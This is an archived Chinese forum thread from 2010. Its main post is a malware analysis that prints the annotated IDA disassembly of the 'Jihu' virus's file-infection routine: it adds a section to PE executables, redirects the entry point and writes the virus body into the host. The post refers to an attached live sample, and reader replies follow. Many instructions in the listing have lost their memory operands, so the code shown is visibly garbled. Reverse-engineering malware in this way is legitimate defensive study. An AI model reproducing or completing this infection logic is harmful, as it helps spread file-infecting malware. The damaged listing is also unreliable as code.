极虎感染型病毒感染代码的详细分析

fzyr520 发表于 2010-7-6 19:18:45

本帖最后由 fzyr520 于 2010-7-7 10:17 编辑

【文章标题】:  极虎感染型病毒感染代码的详细分析
【文章作者】:  fzyr520
【使用工具】: OD,IDA,PEID
【操作平台】: XP-SP2
【作者声明】: 看过几个站对极虎病毒的分析，但是都没分析感染部分，我补上吧，如有不对请指正。

感染带我我标注的函数是Infect
EXPLORER.EXE（感染源）放出appmgmts.dll，感染功能在appmgmts.dll中
解压密码：123

1.先判断时候有签名，如果是系统签名文件就不感染；.text:00406B36 ; int __stdcall Infect(LPCSTR lpMultiByteStr)
.text:00406B36 Infect       proc near             ; CODE XREF: sub_405F38+FCp
.text:00406B36
.text:00406B36 var_13C       = dword ptr -13Ch
.text:00406B36 var_138       = dword ptr -138h
.text:00406B36 var_134       = byte ptr -134h
.text:00406B36 var_E8       = dword ptr -0E8h
.text:00406B36 Infect_Section_FileOffset= dword ptr -0E4h
.text:00406B36 var_E0       = dword ptr -0E0h
.text:00406B36 var_DC       = byte ptr -0DCh
.text:00406B36 PE             = dword ptr -90h
.text:00406B36 EntryPoint_source= dword ptr -8Ch
.text:00406B36 CreationTime = byte ptr -88h
.text:00406B36 var_70       = dword ptr -70h
.text:00406B36 Buffer       = dword ptr -6Ch
.text:00406B36 hFile          = dword ptr -68h
.text:00406B36 Dst          = dword ptr -64h
.text:00406B36 var_60       = dword ptr -60h
.text:00406B36 SizeOf_InfectSource= dword ptr -5Ch
.text:00406B36 InfectSection_VirtualAddress= dword ptr -58h
.text:00406B36 SizeOf_InfectSource_FileOffSet= dword ptr -54h
.text:00406B36 var_50       = dword ptr -50h
.text:00406B36 var_42       = word ptr -42h
.text:00406B36 var_40       = dword ptr -40h
.text:00406B36 var_3C       = dword ptr -3Ch
.text:00406B36 current_section = dword ptr -38h
.text:00406B36 NumberOfBytesWritten= dword ptr -34h
.text:00406B36 hObject       = dword ptr -30h
.text:00406B36 var_2C       = dword ptr -2Ch
.text:00406B36 lpBaseAddress = dword ptr -28h
.text:00406B36 var_24       = dword ptr -24h
.text:00406B36 var_20       = dword ptr -20h
.text:00406B36 raw_size       = dword ptr -1Ch
.text:00406B36 var_18       = dword ptr -18h
.text:00406B36 var_10       = dword ptr -10h
.text:00406B36 var_4          = dword ptr -4
.text:00406B36 lpMultiByteStr  = dword ptr  8
.text:00406B36 arg_20       = dword ptr  28h
.text:00406B36 arg_34       = dword ptr  3Ch
.text:00406B36
.text:00406B36                push ebp
.text:00406B37                mov    ebp, esp
.text:00406B39                push 0FFFFFFFFh
.text:00406B3B                push offset unk_409F00
.text:00406B40                push offset loc_4089A0
.text:00406B45                mov    eax, large fs:0
.text:00406B4B                push eax
.text:00406B4C                mov    large fs:0, esp
.text:00406B53                push ecx
.text:00406B54                push ecx
.text:00406B55                sub    esp, 124h
.text:00406B5B                push ebx
.text:00406B5C                push esi
.text:00406B5D                push edi
.text:00406B5E                mov    , esp
.text:00406B61                and    , 0
.text:00406B65                and    , 0
.text:00406B69                and    , 0
.text:00406B6D                and    , 0
.text:00406B71                and    , 0
.text:00406B75                and    , 0
.text:00406B79                and    , 0
.text:00406B7D                and    , 0
.text:00406B81                and    , 0
.text:00406B88                and    , 0
.text:00406B8C                or    , 0FFFFFFFFh
.text:00406B90                and    , 0
.text:00406B94                and    , 0
.text:00406B9B                and    , 0
.text:00406B9F                and    , 0
.text:00406BA3                push ; lpMultiByteStr
.text:00406BA6                call JudgmentWinVerifyTrust
.text:00406BAB                cmp    eax, 1       ;
.text:00406BAB                                        ; 签名判断,不感染系统签名文件
.text:00406BAB                                        ;
.text:00406BAE                jnz    short loc_406BB5
.text:00406BB0                jmp    loc_4071A4
2.文件映射
.text:00406BDE ; ---------------------------------------------------------------------------
.text:00406BDE
.text:00406BDE loc_406BDE:                            ; CODE XREF: Infect+A1j
.text:00406BDE                push 0             ; int
.text:00406BE0                lea    eax,
.text:00406BE6                push eax          ; lpCreationTime
.text:00406BE7                push    ; hFile
.text:00406BEA                call __GetFileTime
.text:00406BEF                push FILE_END       ; dwMoveMethod
.text:00406BF1                push 0             ; lpDistanceToMoveHigh
.text:00406BF3                push 0             ; lDistanceToMove
.text:00406BF5                push    ; hFile
.text:00406BF8                call ds:SetFilePointer
.text:00406BFE                mov    , eax
.text:00406C01                push 0             ; lpName
.text:00406C03                push 0             ; dwMaximumSizeLow
.text:00406C05                push 0             ; dwMaximumSizeHigh
.text:00406C07                push PAGE_READWRITE  ; flProtect
.text:00406C09                push 0             ; lpFileMappingAttributes
.text:00406C0B                push    ; hFile
.text:00406C0E                call ds:CreateFileMappingA
.text:00406C14                mov    , eax
.text:00406C17                cmp    , 0 ;
.text:00406C17                                        ; 比较创建文件映射是否成功
.text:00406C17                                        ;
.text:00406C1B                jnz    short loc_406C22
.text:00406C1D                jmp    loc_4071A4
.text:00406C22 ; ---------------------------------------------------------------------------
.text:00406C22
.text:00406C22 loc_406C22:                            ; CODE XREF: Infect+E5j
.text:00406C22                push 400h          ; dwNumberOfBytesToMap
.text:00406C27                push 0             ; dwFileOffsetLow
.text:00406C29                push 0             ; dwFileOffsetHigh
.text:00406C2B                push FILE_MAP_ALL_ACCESS ; dwDesiredAccess
.text:00406C30                push ; hFileMappingObject
.text:00406C33                call ds:MapViewOfFile
.text:00406C39                mov    , eax
.text:00406C3C                cmp    , 0
.text:00406C40                jz    short loc_406C4F
.text:00406C42                mov    eax,
.text:00406C45                movzx eax, word ptr
.text:00406C48                cmp    eax, 5A4Dh    ;
.text:00406C48                                        ; 比较是否为MZ
.text:00406C48                                        ;
.text:00406C4D                jz    short loc_406C54
.text:00406C4F
.text:00406C4F loc_406C4F:                            ; CODE XREF: Infect+10Aj
.text:00406C4F                jmp    loc_4071A4
.text:00406C54 ; ---------------------------------------------------------------------------
.text:00406C54
.text:00406C54 loc_406C54:                            ; CODE XREF: Infect+117j
.text:00406C54                mov    eax,
.text:00406C57                mov    ecx,
.text:00406C5A                add    ecx,
.text:00406C5D                mov    , ecx
.text:00406C63                mov    eax,
.text:00406C66                add    eax,
.text:00406C69                cmp    , eax
.text:00406C6F                jnb    short loc_406C8C
.text:00406C71                mov    eax,
.text:00406C77                cmp    eax,
.text:00406C7A                jbe    short loc_406C8C
.text:00406C7C                mov    eax,
.text:00406C82                movzx eax, word ptr
.text:00406C85                cmp    eax, 4550h    ;
.text:00406C85                                        ; 比较是否是PE
.text:00406C8A                jz    short loc_406C91
.text:00406C8C
.text:00406C8C loc_406C8C:                            ; CODE XREF: Infect+139j
.text:00406C8C                                        ; Infect+144j
.text:00406C8C                jmp    loc_4071A4
.text:00406C91 ; ---------------------------------------------------------------------------
.text:00406C91
.text:00406C91 loc_406C91:                            ; CODE XREF: Infect+154j
.text:00406C91                mov    eax,
.text:00406C97                movzx eax, word ptr ; 节数目
.text:00406C9B                dec    eax
.text:00406C9C                imul eax, 28h
.text:00406C9F                mov    ecx,   ;
.text:00406C9F                                        ; ebp-90 导出表
.text:00406C9F                                        ;
.text:00406CA5                lea    eax,
.text:00406CAC                mov    , eax ;
.text:00406CAC                                        ; 最后一个节的节名放入ebp+var_20
.text:00406CAC                                        ;
.text:00406CAF                mov    eax,
.text:00406CB2                movzx eax, word ptr ; NumberOfLinenumbers
.text:00406CB6                movzx ecx, word_40BE64 ; 和 D9比
.text:00406CB6                                        ;
.text:00406CBD                cmp    eax, ecx
.text:00406CBF                jl    short loc_406CC6
.text:00406CC1                jmp    loc_4071A4
.text:00406CC6 ; ---------------------------------------------------------------------------
.text:00406CC6
.text:00406CC6 loc_406CC6:                            ; CODE XREF: Infect+189j
.text:00406CC6                mov    eax,
.text:00406CC9                movzx eax, word ptr
.text:00406CCD                test eax, eax
.text:00406CCF                jz    loc_406D5C    ;
.text:00406CCF                                        ; 此处跳走
.text:00406CCF                                        ;
3.具体感染过程，代码有点长
.text:00406D5C                                        ; Infect+1AFj
.text:00406D5C                mov    eax,
.text:00406D62                movzx eax, word ptr
.text:00406D66                imul eax, 28h
.text:00406D69                add    eax, 0F8h    ; 到节表的最后一个节后面,后面紧接着判断是否为0，
.text:00406D69                                        ; 28H大小
.text:00406D6E                mov    , eax
.text:00406D71                mov    eax,
.text:00406D77                add    eax,
.text:00406D7A                mov    , eax ; ebp+var_70 最后一个节结束的内存内存地址
.text:00406D7D                cmp    , 0 ;
.text:00406D7D                                        ; ebp+var_2C = 00000000 判断最后一个接后面的起始位置是否
.text:00406D7D                                        ; 是0
.text:00406D7D                                        ;
.text:00406D81                jnz    short loc_406DB7
.text:00406D83                and    , 0
.text:00406D87                jmp    short loc_406D90 ;
.text:00406D87                                        ; 循环加4,直到大小为4*A 大小，就是一个节的大小28
.text:00406D87                                        ;
.text:00406D89 ; ---------------------------------------------------------------------------
.text:00406D89
.text:00406D89 loc_406D89:                            ; CODE XREF: Infect+274j
.text:00406D89                mov    eax,
.text:00406D8C                inc    eax
.text:00406D8D                mov    , eax
.text:00406D90
.text:00406D90 loc_406D90:                            ; CODE XREF: Infect+251j
.text:00406D90                cmp    , 0Ah ;
.text:00406D90                                        ; 循环加4,直到大小为4*A 大小，就是一个节的大小28
.text:00406D90                                        ;
.text:00406D94                jge    short loc_406DAC
.text:00406D96                mov    eax,
.text:00406D99                mov    ecx,
.text:00406D9C                add    ecx,
.text:00406D9E                mov    , ecx
.text:00406DA1                mov    eax,
.text:00406DA4                add    eax, 4
.text:00406DA7                mov    , eax
.text:00406DAA                jmp    short loc_406D89
.text:00406DAC ; ---------------------------------------------------------------------------
.text:00406DAC
.text:00406DAC loc_406DAC:                            ; CODE XREF: Infect+25Ej
.text:00406DAC                cmp    , 0
.text:00406DB0                jz    short loc_406DB7
.text:00406DB2                jmp    loc_4071A4
.text:00406DB7 ; ---------------------------------------------------------------------------
.text:00406DB7
.text:00406DB7 loc_406DB7:                            ; CODE XREF: Infect+24Bj
.text:00406DB7                                        ; Infect+27Aj
.text:00406DB7                mov    eax,
.text:00406DBD                mov    eax,
.text:00406DC0                mov    , eax ;
.text:00406DC0                                        ; 存放原始入口点
.text:00406DC0                                        ;
.text:00406DC6                mov    eax,
.text:00406DCC                movzx eax, word ptr
.text:00406DD0                dec    eax
.text:00406DD1                imul eax, 28h
.text:00406DD4                mov    ecx,
.text:00406DDA                lea    eax,
.text:00406DE1                mov    , eax
.text:00406DE4                push 28h          ; Size
.text:00406DE6                push 0             ; Val
.text:00406DE8                lea    eax,
.text:00406DEB                push eax          ; Dst
.text:00406DEC                call memset
.text:00406DF1                add    esp, 0Ch
.text:00406DF4                mov    , 'ct.' ; 节名
.text:00406DFB                mov    eax,
.text:00406E01                mov    , eax
.text:00406E04                mov    eax,
.text:00406E0A                push ; 节对齐大小
.text:00406E0D                mov    eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E12                add    eax, 1FBh
.text:00406E17                push eax
.text:00406E18                call CalculateSection ;
.text:00406E18                                        ; 按节对齐的方式计算添加的感染节.tc 的virtual size
.text:00406E18                                        ;fun(infect_source_size+infect_section_size,SectionAlignment)
.text:00406E18                                        ;
.text:00406E1D                mov    , eax ; 3e000
.text:00406E20                mov    eax,
.text:00406E26                push
.text:00406E29                mov    eax,
.text:00406E2C                push
.text:00406E2F                call CalculateSection ;
.text:00406E2F                                        ; 按节对齐的方式计算正常文件最后一个节的virtual_size
.text:00406E2F                                        ;
.text:00406E34                mov    ecx, ;
.text:00406E34                                        ;
.text:00406E37                add    eax, ;
.text:00406E37                                        ;  计算得到感染节的VirtualAddress
.text:00406E37                                        ;
.text:00406E3A                mov    , eax
.text:00406E3D                mov    eax,
.text:00406E43                push ; 文件对齐大小
.text:00406E46                mov    eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E4B                add    eax, 1FBh
.text:00406E50                push eax
.text:00406E51                call CalculateSection ;
.text:00406E51                                        ; 按文件对齐的方式计算添加的感染节.tc 的
.text:00406E51                                        ; raw size大小
.text:00406E51                                        ;fun(infect_source_size+infect_section_size,FileAlignment)
.text:00406E56                mov    , eax
.text:00406E59                and    , 0
.text:00406E60                push 4Ch          ; Size
.text:00406E62                push 0             ; Val
.text:00406E64                lea    eax,
.text:00406E6A                push eax          ; Dst
.text:00406E6B                call memset
.text:00406E70                add    esp, 0Ch
.text:00406E73                and    , 0
.text:00406E7A                push 4Ch          ; Size
.text:00406E7C                push 0             ; Val
.text:00406E7E                lea    eax,
.text:00406E84                push eax          ; Dst
.text:00406E85                call memset
.text:00406E8A                add    esp, 0Ch
.text:00406E8D                and    , 0
.text:00406E91                mov    , 1
.text:00406E98                jmp    short loc_406EA1
.text:00406E9A ; ---------------------------------------------------------------------------
.text:00406E9A
.text:00406E9A loc_406E9A:                            ; CODE XREF: Infect:loc_406F0Cj
.text:00406E9A                mov    eax,
.text:00406E9D                inc    eax          ;
.text:00406E9D                                        ; 节数加1
.text:00406E9D                                        ;
.text:00406E9E                mov    , eax
.text:00406EA1
.text:00406EA1 loc_406EA1:                            ; CODE XREF: Infect+362j
.text:00406EA1                mov    eax,
.text:00406EA7                movzx eax,
.text:00406EAB                cmp    , eax ;
.text:00406EAB                                        ; 比较节从第一个节开始
.text:00406EAB                                        ;
.text:00406EAE                jg    short loc_406F0E
.text:00406EB0                mov    eax,
.text:00406EB6                movzx eax,
.text:00406EBA                sub    eax,
.text:00406EBD                imul eax, 28h
.text:00406EC0                mov    ecx,
.text:00406EC6                lea    eax,
.text:00406ECD                mov    , eax
.text:00406ED0                mov    eax,
.text:00406ED3                cmp    , 0 ; 比较节大小是否为0
.text:00406ED7                jz    short loc_406F0C
.text:00406ED9                mov    eax,
.text:00406EDC                mov    eax, ; 节文件偏移
.text:00406EDF                mov    ecx,
.text:00406EE2                add    eax, ;
.text:00406EE2                                        ; 节偏移+节大小 = 计算添加感染节的raw offset
.text:00406EE2                                        ; 由于在循环体中，这里计算是每个节的节偏移加节大小
.text:00406EE5                mov    , eax
.text:00406EE8                mov    eax, ; 上面计算了节偏移+节大小
.text:00406EE8                                        ; 这里 ebp+var_24 是下一个节的raw offset
.text:00406EE8                                        ;
.text:00406EEB                sub    eax, ; 计算 current_section raw size
.text:00406EEE                mov    ecx, ; ebp+var_2C 从0开始
.text:00406EF1                mov    , eax ; 把算出来的值存入var_138
.text:00406EF8                mov    eax,
.text:00406EFB                mov    ecx,
.text:00406EFE                mov    , ecx
.text:00406F05                mov    eax,
.text:00406F08                inc    eax          ;
.text:00406F08                                        ; 从第一个节开始循环加一
.text:00406F08                                        ;
.text:00406F09                mov    , eax
.text:00406F0C
.text:00406F0C loc_406F0C:                            ; CODE XREF: Infect+3A1j
.text:00406F0C                jmp    short loc_406E9A
.text:00406F0E ; ---------------------------------------------------------------------------
.text:00406F0E
.text:00406F0E loc_406F0E:                            ; CODE XREF: Infect+378j
.text:00406F0E                and    , 0
.text:00406F15                mov    eax,
.text:00406F1B                mov    , eax
.text:00406F1E                and    , 0
.text:00406F22                jmp    short loc_406F2B
.text:00406F24 ; ---------------------------------------------------------------------------
.text:00406F24
.text:00406F24 loc_406F24:                            ; CODE XREF: Infect:loc_406F4Fj
.text:00406F24                mov    eax,
.text:00406F27                inc    eax          ; 节循环加1
.text:00406F28                mov    , eax
.text:00406F2B
.text:00406F2B loc_406F2B:                            ; CODE XREF: Infect+3ECj
.text:00406F2B                mov    eax,
.text:00406F2E                cmp    eax,
.text:00406F31                jge    short loc_406F51
.text:00406F33                mov    eax,
.text:00406F36                mov    ecx,
.text:00406F39                cmp    ecx, ; 比较每个节的raw_size是否为0
.text:00406F40                jbe    short loc_406F4F
.text:00406F42                mov    eax,
.text:00406F45                mov    eax,
.text:00406F4C                mov    , eax
.text:00406F4F
.text:00406F4F loc_406F4F:                            ; CODE XREF: Infect+40Aj
.text:00406F4F                jmp    short loc_406F24
.text:00406F51 ; ---------------------------------------------------------------------------
.text:00406F51
.text:00406F51 loc_406F51:                            ; CODE XREF: Infect+3FBj
.text:00406F51                and    , 0
.text:00406F55                jmp    short loc_406F5E
.text:00406F57 ; ---------------------------------------------------------------------------
.text:00406F57
.text:00406F57 loc_406F57:                            ; CODE XREF: Infect:loc_406F87j
.text:00406F57                mov    eax,
.text:00406F5A                inc    eax
.text:00406F5B                mov    , eax
.text:00406F5E
.text:00406F5E loc_406F5E:                            ; CODE XREF: Infect+41Fj
.text:00406F5E                mov    eax,
.text:00406F61                cmp    eax,
.text:00406F64                jge    short loc_406F89
.text:00406F66                mov    eax,
.text:00406F69                mov    ecx,
.text:00406F6C                cmp    ecx,
.text:00406F73                jnz    short loc_406F87
.text:00406F75                mov    eax,
.text:00406F78                mov    eax,
.text:00406F7F                mov    , eax
.text:00406F85                jmp    short loc_406F89
.text:00406F87 ; ---------------------------------------------------------------------------
.text:00406F87
.text:00406F87 loc_406F87:                            ; CODE XREF: Infect+43Dj
.text:00406F87                jmp    short loc_406F57
.text:00406F89 ; ---------------------------------------------------------------------------
.text:00406F89
.text:00406F89 loc_406F89:                            ; CODE XREF: Infect+42Ej
.text:00406F89                                        ; Infect+44Fj
.text:00406F89                cmp    , 0
.text:00406F90                jnz    short loc_406F9C
.text:00406F92                mov    , 1
.text:00406F9C
.text:00406F9C loc_406F9C:                            ; CODE XREF: Infect+45Aj
.text:00406F9C                mov    eax,
.text:00406FA2                movzx eax,
.text:00406FA6                sub    eax,
.text:00406FAC                imul eax, 28h
.text:00406FAF                mov    ecx,
.text:00406FB5                lea    eax,
.text:00406FBC                mov    , eax
.text:00406FBF                mov    eax,
.text:00406FC5                push
.text:00406FC8                mov    eax,
.text:00406FCB                push
.text:00406FCE                call CalculateSection ; 按文件对齐的方式计算正常文件最后一个节的大小
.text:00406FD3                mov    , eax
.text:00406FD6                mov    eax,
.text:00406FD9                mov    ecx,
.text:00406FDC                add    ecx, ; 计算感染节的raw_offset
.text:00406FDF                mov    , ecx
.text:00406FE5                mov    eax,
.text:00406FE8                sub    eax,
.text:00406FEE                mov    , eax
.text:00406FF4                cmp    , 0 ;
.text:00406FF4                                        ; 比较节大小是否为0
.text:00406FF4                                        ;
.text:00406FF8                jz    short loc_40700A
.text:00406FFA                xor    eax, eax
.text:00406FFC                sub    eax,
.text:00407002                mov    , eax
.text:00407008                jmp    short loc_407019
.text:0040700A ; ---------------------------------------------------------------------------
.text:0040700A
.text:0040700A loc_40700A:                            ; CODE XREF: Infect+4C2j
.text:0040700A                mov    eax,
.text:00407010                sub    eax,
.text:00407013                mov    , eax
.text:00407019
.text:00407019 loc_407019:                            ; CODE XREF: Infect+4D2j
.text:00407019                mov    eax,
.text:0040701F                mov    , eax
.text:00407022                mov    , 0E0000020h
.text:00407029                mov    ax, word_40BE64 ; word_40BE64 = d9
.text:0040702F                mov    , ax
.text:00407033                push 28h          ; Size
.text:00407035                lea    eax,
.text:00407038                push eax          ; Src
.text:00407039                mov    eax,
.text:0040703F                add    eax,
.text:00407042                push eax          ; Dst
.text:00407043                call memcpy
.text:00407048                add    esp, 0Ch
.text:0040704B                mov    eax,
.text:00407051                movzx eax,
.text:00407055                inc    eax          ;
.text:00407055                                        ; 节数加1
.text:00407055                                        ;
.text:00407056                mov    ecx,
.text:0040705C                mov    , ax ;
.text:0040705C                                        ; 修改PE节的数目为感染后节数目
.text:0040705C                                        ;
.text:00407060                mov    eax,
.text:00407066                cmp    , 0 ; 比较sizeofcode是否为0
.text:0040706A                jz    short loc_407081
.text:0040706C                mov    eax,
.text:00407072                mov    eax,
.text:00407075                add    eax, ; 计算感染后的SizeOfCode
.text:00407078                mov    ecx,
.text:0040707E                mov    , eax ; 用感染后的sizeofcode替换掉原始值
.text:0040707E                                        ;
.text:00407081
.text:00407081 loc_407081:                            ; CODE XREF: Infect+534j
.text:00407081                mov    eax,
.text:00407087                mov    ecx, ; InfectSection_VirtualAddress其实就是感染后的入口点
.text:0040708A                mov    , ecx
.text:0040708D                mov    eax,
.text:00407093                mov    eax,
.text:00407096                add    eax, ; 计算得到感染后的SizeOfImage
.text:00407099                mov    ecx,
.text:0040709F                mov    , eax ; 用感染后的sizeofimage替换掉原始值
.text:004070A2                push ; lpBaseAddress
.text:004070A5                call ds:UnmapViewOfFile
.text:004070AB                push ; hObject
.text:004070AE                call ds:CloseHandle
.text:004070B4                and    , 0
.text:004070B8                and    , 0
.text:004070BC                push FILE_END       ; dwMoveMethod
.text:004070BE                push 0             ; lpDistanceToMoveHigh
.text:004070C0                mov    eax,
.text:004070C6                add    eax,
.text:004070C9                push eax          ; lDistanceToMove
.text:004070CA                push    ; hFile
.text:004070CD                call ds:SetFilePointer
.text:004070D3                push    ; hFile
.text:004070D6                call ds:SetEndOfFile ;
.text:004070D6                                        ; 把文件指针移到文件尾增加节的长度3E000
.text:004070D6                                        ;
.text:004070DC                push FILE_END       ; dwMoveMethod
.text:004070DE                push 0             ; lpDistanceToMoveHigh
.text:004070E0                xor    eax, eax
.text:004070E2                sub    eax,
.text:004070E5                push eax          ; lDistanceToMove
.text:004070E6                push    ; hFile
.text:004070E9                call ds:SetFilePointer ;
.text:004070E9                                        ; 把指针移到原始文件尾
.text:004070E9                                        ;
.text:004070EF                push 0             ; lpOverlapped
.text:004070F1                lea    eax,
.text:004070F4                push eax          ; lpNumberOfBytesWritten
.text:004070F5                push 1FBh          ; nNumberOfBytesToWrite
.text:004070FA                push offset loc_409B78 ;
.text:004070FA                                        ; loc_409B78 为感染节的代码大小为1FB
.text:004070FA                                        ;
.text:004070FF                push    ; hFile
.text:00407102                call ds:WriteFile ;
.text:00407102                                        ; 向增加的节写入感染代码
.text:00407102                                        ;
.text:00407108                push 0             ; lpOverlapped
.text:0040710A                lea    eax,
.text:0040710D                push eax          ; lpNumberOfBytesWritten
.text:0040710E                push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407114                push lpBuffer       ; lpBuffer
.text:0040711A                push    ; hFile
.text:0040711D                call ds:WriteFile ;
.text:0040711D                                        ; 从1FB处写整个感染源
.text:0040711D                                        ;
.text:00407123                push FILE_CURRENT ; dwMoveMethod
.text:00407125                push 0             ; lpDistanceToMoveHigh
.text:00407127                xor    eax, eax
.text:00407129                sub    eax, nNumberOfBytesToWrite
.text:0040712F                push eax          ; lDistanceToMove
.text:00407130                push    ; hFile
.text:00407133                call ds:SetFilePointer ;
.text:00407133                                        ; 移到感染代码1FB处
.text:00407133                                        ;
.text:00407139                push 0             ; lpOverlapped
.text:0040713B                lea    eax,
.text:0040713E                push eax          ; lpNumberOfBytesWritten
.text:0040713F                push 4             ; nNumberOfBytesToWrite
.text:00407141                push offset nNumberOfBytesToWrite ; lpBuffer
.text:00407146                push    ; hFile
.text:00407149                call ds:WriteFile ;
.text:00407149                                        ; 写入感染源大小3e600,这里会导致前面刚写入的感染源
.text:00407149                                        ; （exe文件）的头4个byte被这个大小覆盖掉
.text:00407149                                        ;
.text:0040714F                mov    eax,
.text:00407152                add    eax, 193h
.text:00407157                mov    ecx,
.text:0040715D                sub    ecx, eax       ;
.text:0040715D                                        ; 计算跳回正常程序的入口点地址，感染代码这个值没有，
.text:0040715D                                        ; 是在这里计算后写入的
.text:0040715D                                        ;
.text:0040715D                                        ;
.text:0040715F                mov    , ecx
.text:00407162                push FILE_CURRENT ; dwMoveMethod
.text:00407164                push 0             ; lpDistanceToMoveHigh
.text:00407166                push 0FFFFFF90h    ; lDistanceToMove
.text:00407168                push    ; hFile
.text:0040716B                call ds:SetFilePointer
.text:00407171                push 0             ; lpOverlapped
.text:00407173                lea    eax,
.text:00407176                push eax          ; lpNumberOfBytesWritten
.text:00407177                push 4             ; nNumberOfBytesToWrite
.text:00407179                lea    eax,
.text:0040717C                push eax          ; lpBuffer
.text:0040717D                push    ; hFile
.text:00407180                call ds:WriteFile ;
.text:00407180                                        ; 写入原始程序入口点地址，也就是jmp跳回正常程序
.text:00407180                                        ;
.text:00407186                push 1             ; int
.text:00407188                lea    eax,
.text:0040718E                push eax          ; lpCreationTime
.text:0040718F                push    ; hFile
.text:00407192                call __GetFileTime
.text:00407197                push    ; hObject
.text:0040719A                call ds:CloseHandle
.text:004071A0                or    , 0FFFFFFFFh
.text:004071A4
.text:004071A4 loc_4071A4:                            ; CODE XREF: Infect+7Aj
.text:004071A4                                        ; Infect+A3j ...
.text:004071A4                cmp    , 0
.text:004071A8                jz    short loc_4071B3
.text:004071AA                push ; lpBaseAddress
.text:004071AD                call ds:UnmapViewOfFile
.text:004071B3
.text:004071B3 loc_4071B3:                            ; CODE XREF: Infect+672j
.text:004071B3                cmp    , 0
.text:004071B7                jz    short loc_4071C2
.text:004071B9                push ; hObject
.text:004071BC                call ds:CloseHandle
.text:004071C2
.text:004071C2 loc_4071C2:                            ; CODE XREF: Infect+681j
.text:004071C2                cmp    , 0FFFFFFFFh
.text:004071C6                jz    short loc_4071D1
.text:004071C8                push    ; hObject
.text:004071CB                call ds:CloseHandle
.text:004071D1
.text:004071D1 loc_4071D1:                            ; CODE XREF: Infect+690j
.text:004071D1                or    , 0FFFFFFFFh
.text:004071D5                jmp    short loc_40720F
.text:004071D7 ; ---------------------------------------------------------------------------
.text:004071D7
.text:004071D7 loc_4071D7:                            ; DATA XREF: .rdata:00409F04o
.text:004071D7                xor    eax, eax
.text:004071D9                inc    eax
.text:004071DA                retn
.text:004071DB ; ---------------------------------------------------------------------------
.text:004071DB
.text:004071DB loc_4071DB:                            ; DATA XREF: .rdata:00409F08o
.text:004071DB                mov    esp,
.text:004071DE                cmp    , 0
.text:004071E2                jz    short loc_4071ED
.text:004071E4                push ; lpBaseAddress
.text:004071E7                call ds:UnmapViewOfFile
.text:004071ED
.text:004071ED loc_4071ED:                            ; CODE XREF: Infect+6ACj
.text:004071ED                cmp    , 0
.text:004071F1                jz    short loc_4071FC
.text:004071F3                push ; hObject
.text:004071F6                call ds:CloseHandle
.text:004071FC
.text:004071FC loc_4071FC:                            ; CODE XREF: Infect+6BBj
.text:004071FC                cmp    , 0FFFFFFFFh
.text:00407200                jz    short loc_40720B
.text:00407202                push    ; hObject
.text:00407205                call ds:CloseHandle
.text:0040720B
.text:0040720B loc_40720B:                            ; CODE XREF: Infect+6CAj
.text:0040720B                or    , 0FFFFFFFFh
.text:0040720F
.text:0040720F loc_40720F:                            ; CODE XREF: Infect+69Fj
.text:0040720F                mov    ecx,
.text:00407212                mov    large fs:0, ecx
.text:00407219                pop    edi
.text:0040721A                pop    esi
.text:0040721B                pop    ebx
.text:0040721C                leave
.text:0040721D                retn 4
.text:0040721D Infect       endp

FlooZy 发表于 2010-7-7 01:13:34

牛逼啊，看不懂

温柔刀客 发表于 2010-7-7 06:56:09

强..

chhzh 发表于 2010-7-7 08:57:32

厉害！！！！！！！！！！！！！！！！！！

matzuirwo 发表于 2010-7-7 16:06:08

传说中的隐码攻击？据说挺给力的么

sucre 发表于 2010-7-9 17:18:37

一直想学习病毒方面的东西

小鸟伊人 发表于 2010-7-10 21:01:19

用IDA分析的吧？
.text:00406B36 var_13C       = dword ptr -13Ch

.text:00406B36 var_138       = dword ptr -138h

.text:00406B36 var_134       = byte ptr -134h

.text:00406B36 var_E8       = dword ptr -0E8h
这些代码是啥意思呀？不是很明白。。。可以指教下不？

fzyr520 发表于 2010-7-12 10:06:52

回复 7# 小鸟伊人
临时变量

心爱永远 发表于 2010-7-12 12:50:29

我也没仔细分析感染部分还有驱动，楼主有没兴趣分析下驱动呵呵~

ptrcracker 发表于 2010-7-17 13:09:28

回复 7# 小鸟伊人

这下好像是在一个函数中的局部变量

systemy 发表于 2010-7-22 03:36:05

最近多看看病毒分析这块
能学到不少好东西呢

akarus 发表于 2010-7-30 01:54:06

慢慢看，

TRJ2010 发表于 2010-8-20 17:14:51

支持楼主提供样本，能传点不要UB的吗？

luuobinf 发表于 2010-8-21 11:23:19

通通保存之

页: [1]

一蓑烟雨论坛's Archiver

极虎感染型病毒感染代码的详细分析